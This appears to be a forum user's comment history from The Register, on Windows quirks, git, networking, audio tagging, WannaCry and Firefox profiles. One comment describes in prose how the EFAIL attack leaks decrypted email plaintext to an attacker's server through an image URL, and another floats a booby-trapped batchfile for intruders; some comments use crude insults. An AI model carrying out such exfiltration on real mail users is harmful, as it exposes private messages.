dude you just burned through this sites yearly allowance of capitals and quote marks for the year, wtf
1188 posts • joined 1 May 2008
Your mates vape. Your boss quit smoking. You promised to quit in 2019. But how will Big Tobacco give it up?
OpenStack 2018: Mark Shuttleworth chats to The Reg about 10-year support plans, Linus Torvalds and Russian rockets
To my mind, however, Microsoft hit a high point for event audio with Windows 95. Subsequent releases of Windows have never reached such glorious levels of gratuitous audio; indeed, the startup and shutdown sounds these days are little more than clicks or bips.
How dare you overlook that Vista's "soundscapes" were imagineered by bleedin' Robert Fripp?
People gonna forget how rock'n'roll MICROS~1 used to be ;)
Re: Not a good look here.
If you're on a multi-user machine, ensuring "your" stuff is insulated by the correct file permissions by default is valuable: I tried making a "personal" folder under C:\ (which last I looked is world-writeable by default - WTF?!) but ensuring the permissions were set to propagate properly was a screaming nightmare. Windows permissions editing ... shudder.
I stopped using [user]\Documents when ransomware became a thing, as this would likely be a default target. The weird symlinking shenanigans to which Documents and its ilk are subject make them problematic for doing backups as well.
As for AppData, I've never grokked the philosophical distinction between Local/LocalLow/Roaming, and it's pretty clear app devs don't either. I never know which one I'll find an app's settings in, let alone why. Some even use more than one of them(?)
At least the FOSS apps can be relied upon to ignore all of them and create a nice predictable [user]\.[appname] folder :)
Linux kernel's Torvalds: 'I am truly sorry' for my 'unprofessional' rants, I need a break to get help
Re: I blame the source code management...
As I recall, the main target of Linus's anger at the time was Andrew Tridgell, for coming out with the reverse-engineered BK client that provoked BK's owner to withdraw the free-beer client license for kernel devs. If git was named for any one person at that time it was probably Tridge.
However, the very swift appearance of git in the wake of BK's move did make me wonder whether Linus had already been working towards dumping BK for some time, having tacitly acknowledged the complaints from many around him about the risks of adopting it in the first place.
Re: For fucks sake
Nah. All the downvotes in the world don't tell the poster that throwing around homophobic slurs (thanks for the repro, @TonyJ) is not OK with the Reg. For a lot of such specimens it only emboldens them. Nuking their post (with presumably a ban-warning given behind the scenes) tells them they're in a place that won't stand for that shit.
to the unhappy days of early-Noughties wifi adapter purchasing for Linux, where not just white-box jobs but most big brands were prone to having their innards completely re-jigged without so much as a telltale hardware rev to warn buyers of its now paperweight status. Traumatic.
@James Hughes 1 if you're still hanging around, is there any way to identify the faulty boards? Are any steps being taken to withdraw them from sales channels? (I don't remember seeing anything about this in the article, although that was a good 5 minutes ago now #NanaMoon)
Someone (possibly here yesterday) explained it thus: The attacker sends a crafted message with three MIME parts to it:
Part 1 (HTML)
Part 2 (PGP / S/MIME)
[Previously-intercepted encrypted message]
Part 2 (HTML)
The silly mail client then glues all three into a single HTML part for display, and if it's REALLY silly it also goes right ahead and fetches the image, which passes the plaintext to $badguyserver in the URL (or as many characters thereof as the system allows for a URL string).
Hope I have that right; for some reason I'm loath to grace the vanity vuln-site with a click.
Re: "Upgrading users should be able to ignore the viewer as before."
My phone's data connection goes through the cabinet as well? Damn. I should try to get them to route mine through the cabinet near my mum's place, I always get better speeds there.
And if the problem's in the cabinet, how much help is the Windows manual going to be?
PCI DSS and POS card terminals
At the moment (as far as I understand it) there is a sizeable difference in the compliance burden for PCI DSS between credit-card terminals that connect via dialup vs over the internet. To wit, terminal on dialup = can just self-certify; terminal over IP = have to get whole network audited regularly.
Doesn't moving to VoIP mean then that every bugger'll have to get audits done? Or will the exemption apply to it as well? Penny-pinching minds demand to know.
Re: "Nobody uses it..."
>A pox on it. We need IPv7 - just add another octet at the start of IPv6..
Couldn't we add one onto IPv4 instead and keep the rest of it the same? Then the hard-won skills of a multitude of consumer grannies (and me) could be transferred and nobody has to play how-many-colons bingo with that ridiculously opaque address scheme. Worked pretty well when we needed more phone numbers, amirite?
Re: On air compression
Wanted to mention you can also add ReplayGain tags (both track and album) to FLAC files, the command-line app "metaflac" can do it. My player supports it, but YMMV.
The loudness issue used to drive me mad on my phone, but after much study I managed to patch the old Android (ICS) Music app to support ReplayGain on MP3s.
Only problem was when Jelly Bean came along and I recompiled the app, it now has "gapless playback" (i.e. a slight crossfade/segue) which when fading from a song with lots of gain applied to one with none or negative gain, there tends to be a split-second burst of EXTREME LOUDNESS until the equalizer adjusts it to where it should be for the next track. I must try to fix this at some point but I fear by then the AOSP app will be abandonware :(
Re: Boobytrap a VM.
Mm, I wondered the same. Not sure the CMD shell can even do that on the host VM all that easily, let alone reaching back through the tubes and doing it to the VNC client's host machine.
Not to mention that if Hide Extensions is enabled (as has been default for quite some time), the mark might wonder why the file *has* a .TXT extension showing?
Now you could name it "Passwords.bat" but the icon would still be wrong. Worth a try would be creating the batchfile elsewhere and placing on the Desktop a shortcut to it, which IIRC you can change the icon of the shortcut.
But I'd still like that recipe for how this batchfile is pwning the intruder's machine. Still with us, OP?
Icon: closest available to "chinny reckon".
Re: ISP reports...
(in a couple case I even got a "recipient does not exist" response)
Now that *should* be enough to see action taken by their (the ISP's) TLD registry, as it violates RFCs, but I imagine for most of them this is equally fruitless.
What you can do however is report the offending IP (and in some cases the ISP's whole IP range if there is enough evidence of endemic misuse) to various spam blacklists (there are many). Then at least you're hopefully reducing the pain for others.
74 countries hit by NSA-powered WannaCrypt ransomware backdoor: Emergency fixes emitted by Microsoft for WinXP+
What the I don't even
I'm reading through the Cisco analysis as I speak, but I'm not yet seeing what's the excuse for being vulnerable to this.
Seems that it
(1) Spreads through unsecured SMB ports
Well what the fuck retard has their MSNet ports out there waving in the breeze of the general Internet in this day and age, FFS? I mean even MS don't sell you an OS any more that does such stupid things OOTB.
(2) Drops a binary, msseseccexxxesexypoo.exe (or something)...
Well how does it drop it and execute it without a by-your-leave? What browser/email client is allowing that to happen, because it doesn't magically happen without a parent vuln or colossally bad design decision to enable it.
I've only skimmed this info so far but please, someone, let me know if I can get this without having my SMB ports open to the WAN and/or ignoring some permutation of Windows/browser/emailer that won't shout at me "UR ABOUT TO RUN A PROGGY OFF TEH INTERNET IT MITE BE BAD ACTULY ITS PROLLY BAD Y/N" prior to executing a downloaded binary (which, Christ, Windows itself actually does a pretty good job of doing lately).
Most of the time Firefox binary release is fine, at times I've used that in preference to whichever distro's package, and that meant getting updates straight away too. I wish Libreoffice had a standalone installer as it's a nightmare trying to satisfy dependencies for Gentoo's binary package of it. I might give the Snap/Flatpak option a look.
Firefox accounts do use end-to-end encryption, so your 2nd and 3rd "rules" are moot. And if the data "being on someone else's computer" still bothers you that much in spite of this, the server software is all open-source so you can host it on your own computer if you want.*
* I did this myself and have to admit it is quite a battle to set it all up correctly, so in the end I asked myself why I was bothering and got a Firefox account instead. #NoRegrets
Re: Need more variety, not less
Some impressively over-engineered solutions above, but this can be accomplished using Firefox alone. I use this feature myself to insulate extra-sensitive workloads from day-to-day omnivorous browsing. Just start Firefox's profile manager:
Create a new profile called e.g. 'banking'. When done, launch not this new profile but your original one (called 'default' by, er default).
Now, without closing Firefox, execute this:
firefox -no-remote -p banking
Voilà: a completely separate instance of Firefox running side-by-side with, but fully insulated from, your normal browsing. And because it's completely separate, you can customise the browser UI, add-ons and other preferences completely independently, to optimise them for the one or few sites you'll use it for.
This. I don't think they appreciate quite how big a kick in the market-share nuts the upcoming bonfire of the legacy add-ons is going to be. The current add-on ecosystem is the only thing besides sentimentality and inertia that's keeping me on board (though I certainly don't much fancy the alternatives either).